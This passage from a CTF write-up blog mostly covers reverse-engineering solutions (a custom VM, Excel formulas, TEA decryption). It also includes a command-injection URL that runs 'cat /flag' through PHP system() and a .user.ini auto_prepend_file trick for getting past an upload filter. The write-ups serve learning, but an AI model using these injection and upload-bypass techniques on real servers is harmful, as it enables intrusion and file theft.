class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[%d], reg[%d]"</span> % (opcode[i+<span class="hljs-number">2</span>],opcode[i+<span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[%d], %d"</span> % (opcode[i+<span class="hljs-number">2</span>], opcode[i+<span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mov reg[0], input[reg[2]]"</span>)<br> i += <span class="hljs-number">4</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span 
class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[0]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[2]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[3]"</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"push reg[0]"</span>)<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> opcode[o]:<br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x01</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[1]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x02</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[2]"</span>)<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"pop reg[3]"</span>)<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span 
class="hljs-string">"pop reg[0]"</span>)<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x03</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span>'</span>, end=<span class="hljs-string">' '</span>)<br> o = i + <span class="hljs-number">1</span><br> <span class="hljs-keyword">match</span> opcode[o]:<br> <span class="hljs-keyword">case</span> <span class="hljs-number">0</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"add reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">1</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"sup reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">2</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"mul reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">3</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"xor reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">4</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"shl reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> <span class="hljs-keyword">case</span> <span class="hljs-number">5</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"shr 
reg[%d],reg[%d]"</span> % (opcode[i + <span class="hljs-number">2</span>], opcode[i + <span class="hljs-number">3</span>]))<br> i += <span class="hljs-number">4</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x04</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> cmp reg[0], reg[1]'</span>)<br> i += <span class="hljs-number">1</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x05</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> jmp %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x06</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> je %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br> <span class="hljs-keyword">case</span> <span class="hljs-number">0x07</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f'<span class="hljs-subst">{i}</span> jne %d '</span> % (opcode[i+<span class="hljs-number">1</span>]))<br> i += <span class="hljs-number">2</span><br></code></pre></td></tr></table></figure></li><li>Output and analysis<br>0 mov reg[2], 0<br>4 add reg[2],reg[3]<br>8 mov reg[0], input[reg[2]]<br>12 mov reg[1], reg[0]<br>// the first four instructions initialise the data<br>16 mov reg[2], 50<br>20 add reg[2],reg[3]<br>24 mov reg[0], input[reg[2]]<br>28 add reg[1],reg[0]<br>// offset 50 marks the second array: the new value is added to the existing reg[1], i.e. the two arrays are added element by element<br>32 mov reg[2], 100<br>36 add reg[2],reg[3]<br>40 mov reg[0], input[reg[2]]<br>44 xor reg[1],reg[0]<br>// offset 100 marks the third array: the new value is xored into the existing reg[1]<br>48 mov reg[0], 8<br>52 mov reg[2], reg[1]<br>56 shl reg[1],reg[0]<br>60 shr reg[2],reg[0]<br>64 add reg[1],reg[2]<br>68 mov reg[0], reg[1]<br>72 push 
reg[0]<br>// this step sets reg[0] to 8, shifts reg[1] left and a copy of it right by that amount, adds the two back into reg[1] and pushes the result onto the stack<br>74 mov reg[0], 1<br>78 add reg[3],reg[0]<br>82 mov reg[0], reg[3]<br>86 mov reg[1], 40<br>90 cmp reg[0], reg[1]<br>91 je 95<br>93 jmp 0<br>95 mov reg[3], 0<br>// this repeats the process above 40 times<br>99 pop reg[1]<br>101 mov reg[2], 150<br>105 add reg[2],reg[3]<br>109 mov reg[0], input[reg[2]]<br>113 cmp reg[0], reg[1]<br>114 jne 136<br>// compares the value popped from the stack with the data at offset 150; if they differ it jumps to 136, otherwise it falls through<br>116 mov reg[0], 1<br>120 add reg[3],reg[0]<br>124 mov reg[0], reg[3]<br>128 mov reg[1], 40<br>132 cmp reg[0], reg[1]<br>133 jne 99<br>// loops back to 99 forty times; looks like a decoy</li></ul><p>So the function is this, written element by element:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># element-wise, with 16-bit registers: a3[i] is built from flag[i], a1[i] and a2[i]</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">encode</span>(<span class="hljs-params">flag, a1, a2</span>):<br>    out = []<br>    <span class="hljs-keyword">for</span> f, x, y <span class="hljs-keyword">in</span> <span class="hljs-built_in">zip</span>(flag, a1, a2):<br>        k2 = y ^ (x + f)<br>        out.append(((k2 << <span class="hljs-number">8</span>) + (k2 >> <span class="hljs-number">8</span>)) & <span class="hljs-number">0xffff</span>)<br>    <span class="hljs-keyword">return</span> out<br><span class="hljs-comment"># inverse: swap the bytes back, undo the xor, undo the add (a3 in flag order; the stack pops it reversed, which a3[::-1] below handles)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decode</span>(<span class="hljs-params">a3, a1, a2</span>):<br>    flag = []<br>    <span class="hljs-keyword">for</span> v, x, y <span class="hljs-keyword">in</span> <span class="hljs-built_in">zip</span>(a3, a1, a2):<br>        k2 = ((v & <span class="hljs-number">0xff</span>) << <span class="hljs-number">8</span>) | (v >> <span class="hljs-number">8</span>)<br>        flag.append(((k2 ^ y) - x) & <span class="hljs-number">0xff</span>)<br>    <span class="hljs-keyword">return</span> flag<br></code></pre></td></tr></table></figure><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs py">a1 = [<span class="hljs-number">155</span>, <span class="hljs-number">168</span>, <span class="hljs-number">2</span>, <span class="hljs-number">188</span>, <span class="hljs-number">172</span>, <span class="hljs-number">156</span>, <span class="hljs-number">206</span>, <span class="hljs-number">250</span>, <span class="hljs-number">2</span>, <span class="hljs-number">185</span>, <span class="hljs-number">255</span>, <span class="hljs-number">58</span>, <span class="hljs-number">116</span>, <span class="hljs-number">72</span>, <span class="hljs-number">25</span>, <span class="hljs-number">105</span>, <span class="hljs-number">232</span>, <span class="hljs-number">3</span>, <span class="hljs-number">203</span>, <span class="hljs-number">201</span>,<br> <span class="hljs-number">255</span>, <span class="hljs-number">252</span>, <span class="hljs-number">128</span>, <span class="hljs-number">214</span>, <span class="hljs-number">141</span>, <span class="hljs-number">215</span>, <span class="hljs-number">114</span>, <span class="hljs-number">0</span>, <span class="hljs-number">167</span>, <span class="hljs-number">29</span>, <span class="hljs-number">61</span>, <span class="hljs-number">153</span>, <span class="hljs-number">136</span>, <span class="hljs-number">153</span>, <span class="hljs-number">191</span>, <span class="hljs-number">232</span>, <span class="hljs-number">150</span>, <span class="hljs-number">46</span>, <span class="hljs-number">93</span>, <span class="hljs-number">87</span>]<br>a2 = [<span class="hljs-number">201</span>, <span 
class="hljs-number">169</span>, <span class="hljs-number">189</span>, <span class="hljs-number">139</span>, <span class="hljs-number">23</span>, <span class="hljs-number">194</span>, <span class="hljs-number">110</span>, <span class="hljs-number">248</span>, <span class="hljs-number">245</span>, <span class="hljs-number">110</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">213</span>, <span class="hljs-number">70</span>, <span class="hljs-number">93</span>, <span class="hljs-number">22</span>, <span class="hljs-number">152</span>, <span class="hljs-number">56</span>, <span class="hljs-number">48</span>, <span class="hljs-number">115</span>, <span class="hljs-number">56</span>,<br> <span class="hljs-number">193</span>, <span class="hljs-number">94</span>, <span class="hljs-number">237</span>, <span class="hljs-number">176</span>, <span class="hljs-number">41</span>, <span class="hljs-number">90</span>, <span class="hljs-number">24</span>, <span class="hljs-number">64</span>, <span class="hljs-number">167</span>, <span class="hljs-number">253</span>, <span class="hljs-number">10</span>, <span class="hljs-number">30</span>, <span class="hljs-number">120</span>, <span class="hljs-number">139</span>, <span class="hljs-number">98</span>, <span class="hljs-number">219</span>, <span class="hljs-number">15</span>, <span class="hljs-number">143</span>, <span class="hljs-number">156</span>]<br>a3 = [<span class="hljs-number">18432</span>, <span class="hljs-number">61696</span>, <span class="hljs-number">16384</span>, <span class="hljs-number">8448</span>, <span class="hljs-number">13569</span>, <span class="hljs-number">25600</span>, <span class="hljs-number">30721</span>, <span class="hljs-number">63744</span>, <span class="hljs-number">6145</span>, <span class="hljs-number">20992</span>, <span class="hljs-number">9472</span>, <span class="hljs-number">23809</span>, <span class="hljs-number">18176</span>, <span 
class="hljs-number">64768</span>, <span class="hljs-number">26881</span>, <span class="hljs-number">23552</span>,<br> <span class="hljs-number">44801</span>, <span class="hljs-number">45568</span>, <span class="hljs-number">60417</span>,<br> <span class="hljs-number">20993</span>, <span class="hljs-number">20225</span>, <span class="hljs-number">6657</span>, <span class="hljs-number">20480</span>, <span class="hljs-number">34049</span>, <span class="hljs-number">52480</span>, <span class="hljs-number">8960</span>, <span class="hljs-number">63488</span>, <span class="hljs-number">3072</span>, <span class="hljs-number">52992</span>, <span class="hljs-number">15617</span>, <span class="hljs-number">17665</span>, <span class="hljs-number">33280</span>, <span class="hljs-number">53761</span>, <span class="hljs-number">10497</span>, <span class="hljs-number">54529</span>, <span class="hljs-number">1537</span>,<br> <span class="hljs-number">41473</span>, <span class="hljs-number">56832</span>, <span class="hljs-number">42497</span>, <span class="hljs-number">51713</span>]<br>a4 = a3[::-<span class="hljs-number">1</span>]<br><span class="hljs-comment"># a4 = [51713, 42497, 56832, 41473, 1537, 54529, 10497, 53761, 33280, 17665, 15617, 52992, 3072, 63488, 8960, 52480, 34049, 20480, 6657, 20225, 20993, 60417, 45568, 44801, 23552, 26881, 64768, 18176, 23809, 9472, 20992, 6145, 63744, 30721, 25600, 13569, 8448, 16384, 61696, 18432]</span><br>flag = [<span class="hljs-number">0</span>] * <span class="hljs-number">40</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">40</span>):<br> flag[i] = ((a4[i] >> <span class="hljs-number">8</span>) & <span class="hljs-number">0xff</span> + (a4[i] << <span class="hljs-number">8</span>))<br> flag[i] ^= a2[i]<br> flag[i] -= a1[i]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">""</span>.join([<span 
class="hljs-built_in">chr</span>(a&<span class="hljs-number">0xff</span>) <span class="hljs-keyword">for</span> a <span class="hljs-keyword">in</span> flag]))<br><br><span class="hljs-comment"># hgame{y0ur_rever5e_sk1ll_i5_very_g0od!!}</span><br></code></pre></td></tr></table></figure><h2 id="强网杯-2024-easy-vm"><a href="#强网杯-2024-easy-vm" class="headerlink" title="[强网杯 2024 easy_vm]"></a>[强网杯 2024 easy_vm]</h2><p>Having gone through last year's challenge, let's look at the 强网杯 VM.</p><ul><li>Packer check<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021111059.png" srcset="/img/loading.gif" lazyload></li><li>IDA analysis<br><img src="https://gitee.com/fogpost/photo/raw/master/202411021116697.png" srcset="/img/loading.gif" lazyload><br>This time the block is rather large, so we will analyse it section by section</li></ul>]]></content>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>sicctfwp</title>
<link href="/2024/11/01/sicctfwp/"/>
<url>/2024/11/01/sicctfwp/</url>
<content type="html"><![CDATA[<h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="Sigin"><a href="#Sigin" class="headerlink" title="Sigin"></a>Sigin</h2><p>Opening the site shows this page<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012216221.png" srcset="/img/loading.gif" lazyload><br>A typical robots hint, so visit robots.txt<br>Following the hint leads to this page<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012217411.png" srcset="/img/loading.gif" lazyload><br>Running it in a local PHP environment produced this</p><blockquote><p>system(get_deined_vars()[_GET)][W3lc0me_t0_SICTF.2024]) </p></blockquote><p>In short, the GET parameter W3lc0me_t0_SICTF.2024 is passed straight to system(). Thanks to 蒋✌ for the tip: PHP rewrites dots in incoming parameter names to underscores, so the name never arrives as written; replacing the underscore before SICTF with [ (W3lc0me_t0[SICTF.2024) makes PHP leave the rest of the name alone, and only then does it work</p><blockquote><p><a href="http://27.25.151.29:33218/wh3re_1s_thi5_fl4g.php?W3lc0me_t0%5BSICTF.2024=cat">http://27.25.151.29:33218/wh3re_1s_thi5_fl4g.php?W3lc0me_t0[SICTF.2024=cat</a> /flag<br>SICTF{e79dbf83-bce6-4545-a9d7-53c527f3f13c} </p></blockquote><h1 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h1><h2 id="Exc"><a href="#Exc" class="headerlink" title="Exc??"></a>Exc??</h2><p>This feels a lot like one from moectf earlier, so let's just open it and look<br>Split this xlsx into the following modules</p><ul><li>Input/output module<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012230759.png" srcset="/img/loading.gif" lazyload></li><li>Algorithm module<br><img src="https://gitee.com/fogpost/photo/raw/master/202411012231237.png" srcset="/img/loading.gif" lazyload><br>First look at the contents of the wrong cell</li></ul><blockquote><p>IF(C3=D19,IF(F3=G19,IF(I3=J19,IF(L3=D21,IF(O3=G21,IF(R3=J21,IF(U3=D23,IF(X3=G23,IF(AA3=J23,</p></blockquote><blockquote><p>IF(D13=Q19,IF(G13=T19,IF(J13=W19,IF(D15=Q21,IF(G15=T21,IF(J15=W21,IF(D17=Q23,IF(G17=T23,IF(J17=W23,</p></blockquote><blockquote><p>IF(D31=AT10,IF(G31=AW10,IF(J31=AZ10,IF(M31=AT12,IF(P31=AW12,IF(S31=AZ12,IF(V31=AT14,IF(Y31=AW14,IF(AB31=AZ14,”Accepted!”)))))))))))))))))))))))))))</p></blockquote><p>
There is an Accepted! string; tracing the condition that produces it shows that the numbers in the input/output module must equal the purple data block in the algorithm module<br>Next, find the formulas that produce the purple output</p><p>They are as follows<br>=BITLSHIFT(CODE(C2),3)+BITLSHIFT(CODE(D2),4)+BITLSHIFT(CODE(E2),5)<br>The second is<br>=CODE(C2)*3+CODE(D2)*4+CODE(E2)*5<br>The third is<br>=CODE(C2)*CODE(D2)+CODE(D2)*CODE(E2)+CODE(E2)*CODE(C2)</p><p>A note on the functions used<br>BITLSHIFT(number, shift_amount): shifts the number left by shift_amount bits<br>CODE(text): returns the ASCII code of the text's first character</p><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs py">enc = [<span class="hljs-number">3976</span>, <span class="hljs-number">5728</span>, <span class="hljs-number">5640</span>, <span class="hljs-number">4232</span>, <span class="hljs-number">5272</span>, <span class="hljs-number">3776</span>, <span class="hljs-number">6464</span>, <span class="hljs-number">6136</span>, <span class="hljs-number">5408</span>]<br>enc1 = [<span class="hljs-number">876</span>, <span class="hljs-number">1147</span>, <span class="hljs-number">1182</span>, <span class="hljs-number">824</span>, <span class="hljs-number">1082</span>, <span class="hljs-number">866</span>, <span class="hljs-number">1361</span>, <span class="hljs-number">1278</span>, <span class="hljs-number">1087</span>]<br>enc2 = [<span class="hljs-number">16511</span>, <span class="hljs-number">24822</span>, <span class="hljs-number">26991</span>, <span 
class="hljs-number">11999</span>, <span class="hljs-number">21215</span>, <span class="hljs-number">16374</span>, <span class="hljs-number">37800</span>, <span class="hljs-number">32739</span>, <span class="hljs-number">21505</span>]<br><br><span class="hljs-keyword">for</span> l <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">9</span>):<br>    found = <span class="hljs-literal">False</span>  <span class="hljs-comment"># reset the found flag for this triple</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br>            <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">32</span>, <span class="hljs-number">127</span>):<br>                <span class="hljs-comment"># use and rather than &</span><br>                <span class="hljs-keyword">if</span> (i * <span class="hljs-number">8</span> + j * <span class="hljs-number">16</span> + k * <span class="hljs-number">32</span> == enc[l] <span class="hljs-keyword">and</span><br>                        i * <span class="hljs-number">3</span> + j * <span class="hljs-number">4</span> + k * <span class="hljs-number">5</span> == enc1[l] <span class="hljs-keyword">and</span><br>                        i * j + j * k + k * i == enc2[l]):<br>                    <span class="hljs-built_in">print</span>(<span class="hljs-string">f"<span class="hljs-subst">{<span class="hljs-built_in">chr</span>(i)}</span><span class="hljs-subst">{<span class="hljs-built_in">chr</span>(j)}</span><span class="hljs-subst">{<span class="hljs-built_in">chr</span>(k)}</span>"</span>, end=<span class="hljs-string">""</span>)<br>                    found = <span class="hljs-literal">True</span>  <span class="hljs-comment"># set the found flag</span><br>                    <span class="hljs-keyword">break</span>  <span class="hljs-comment"># leave the innermost loop</span><br>            <span class="hljs-keyword">if</span> found:  <span class="hljs-comment"># a match was found, leave the middle loop</span><br>                <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">if</span> found:  <span class="hljs-comment"># a match was found, leave the outer loop</span><br>            <span class="hljs-keyword">break</span><br><br></code></pre></td></tr></table></figure><p>SICTF{Exc31_1s_r3@lly_fun!}</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>nssctf2024秋季回顾</title>
<link href="/2024/10/31/nssctf2024%E7%A7%8B%E5%AD%A3%E5%9B%9E%E9%A1%BE/"/>
<url>/2024/10/31/nssctf2024%E7%A7%8B%E5%AD%A3%E5%9B%9E%E9%A1%BE/</url>
<content type="html"><![CDATA[<h1 id="nssctf2024秋季回顾"><a href="#nssctf2024秋季回顾" class="headerlink" title="nssctf2024秋季回顾"></a>NSSCTF 2024 autumn review</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>This was a fairly comfortable competition for me, though I slacked off towards the end and left many challenges unread, mostly for lack of ideas. This review covers the ones I could not solve or want to learn from; the ones I already solved I will not write up again.</p><h2 id="reverse"><a href="#reverse" class="headerlink" title="reverse"></a>reverse</h2><h3 id="NSS茶馆"><a href="#NSS茶馆" class="headerlink" title="NSS茶馆"></a>NSS茶馆</h3><p>I did not expect this one to be TEA; I have seen it less lately and my eye for it has dulled, so it deserves a proper look</p><ul><li>Packer check first<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312022329.png" srcset="/img/loading.gif" lazyload></li><li>As usual, open it as 32-bit<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312040919.png" srcset="/img/loading.gif" lazyload><br>In this screenshot sub_411118 is our decryption function; next, the check function<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312046855.png" srcset="/img/loading.gif" lazyload><br>The TEA itself<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312047549.png" srcset="/img/loading.gif" lazyload><br>Solve script<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs c++"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><bits/stdc++.h></span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">decrypt</span><span class="hljs-params">(<span class="hljs-type">uint32_t</span>* v,<span class="hljs-type">uint32_t</span> * k)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">uint32_t</span> v0=v[<span class="hljs-number">0</span>],v1=v[<span class="hljs-number">1</span>],sum=<span class="hljs-number">1131796</span>*<span class="hljs-number">33</span>, i;<br> <span class="hljs-type">uint32_t</span> delta=<span class="hljs-number">1131796</span>;<br> <span class="hljs-type">uint32_t</span> k0=k[<span class="hljs-number">0</span>],k1=k[<span class="hljs-number">1</span>],k2=k[<span class="hljs-number">2</span>],k3=k[<span class="hljs-number">3</span>];<br> <span class="hljs-keyword">for</span> (i=<span class="hljs-number">0</span>; i<<span class="hljs-number">33</span>; i++){<br> v1-=((v0<<<span class="hljs-number">4</span>)+k2)^(v0+sum)^((v0>><span class="hljs-number">5</span>)+k3);<br> v0-=((v1<<<span class="hljs-number">4</span>)+k0)^(v1+sum)^((v1>><span class="hljs-number">5</span>)+k1);<br> sum -=delta;<br> }<br> v[<span class="hljs-number">0</span>]=v0;v[<span 
class="hljs-number">1</span>]=v1;<br>}<br><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> {<br> <span class="hljs-type">uint32_t</span> values[<span class="hljs-number">2</span>];<br>} Data;<br><br><span class="hljs-comment">// unsigned char enc[] =</span><br><span class="hljs-comment">// {</span><br><span class="hljs-comment">// 0x65, 0xD2, 0x26, 0x3A, 0xB6, 0xA0, 0xD9, 0x81, 0x2A, 0x00, </span><br><span class="hljs-comment">// 0x5E, 0x0E, 0xE5, 0xEF, 0x07, 0x39, 0x57, 0xBC, 0xB6, 0x71, </span><br><span class="hljs-comment">// 0xA2, 0x0D, 0xAC, 0xE0</span><br><span class="hljs-comment">// };</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>{<br> Data v[<span class="hljs-number">3</span>]={{<span class="hljs-number">0x3A26D265</span>,<span class="hljs-number">0x81D9A0B6</span>},{<span class="hljs-number">0x0E5E002A</span>,<span class="hljs-number">0x3907EFE5</span>},{<span class="hljs-number">0x71B6BC57</span>,<span class="hljs-number">0xE0AC0DA2</span>}};<br> <span class="hljs-type">uint32_t</span> k[<span class="hljs-number">4</span>]={<span class="hljs-number">0x0B</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x21</span>, <span class="hljs-number">0x2C</span>};<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">3</span>; i++)<br> {<br> <span class="hljs-built_in">decrypt</span>(v[i].values,k);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"decrtp:%x %x\n"</span>,v[i].values[<span class="hljs-number">0</span>],v[i].values[<span class="hljs-number">1</span>]);<br> }<br> <br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure>结果是这个<br>decrtp:4e535343 54467b74<br>decrtp:65615f69 
735f736f<br>decrtp:5f656173 7921217d<br>直接就是hex转chr了<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312118868.png" srcset="/img/loading.gif" lazyload><br>NSSCTF{tea_is_so_easy!!}</li></ul><h3 id="MD5爆破"><a href="#MD5爆破" class="headerlink" title="MD5爆破"></a>MD5爆破</h3><p>纯手撸,题解也看不懂,脚本都跑不动</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="怎么多了个没用的php文件"><a href="#怎么多了个没用的php文件" class="headerlink" title="怎么多了个没用的php文件"></a>怎么多了个没用的php文件</h3><p>开头就是一个文件上传页面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011425977.png" srcset="/img/loading.gif" lazyload><br>我们选择一个文件直接上传,png可以上传,对php有过滤<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011439740.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011440878.png" srcset="/img/loading.gif" lazyload><br>然后我们尝试抓包并修改数据,可以成功上传,尝试访问<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011442332.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011442165.png" srcset="/img/loading.gif" lazyload><br>其中也尝试了其他的后缀,不过可以上传但是不可以解析,按照别人的wp来看,好像是uploads目录下有一个notion.php文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011454711.png" srcset="/img/loading.gif" lazyload><br>尝试上传.user.ini</p><blockquote><p>.user.ini 是⼀个⽤户⾃定义的php.ini ⽂件,会在其所在的当前⽬录⽣效,优先级⾼于php.ini<br>在user.ini中写⼊以下内容<br>auto_prepend_file = <filename> //包含在⽂件头<br>auto_append_file = <filename> //包含在⽂件尾<br>写⼊其中⼀个即可<br><filename>就写成需要包含的⽂件名,后缀任意上传后,该⽬录下的php⽂件就会⾃动包含<filename><br>.user.ini</p></blockquote><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">auto_prepend_file</span> = 外部文件包含.png<br><span class="hljs-attr">auto_append_file</span> = 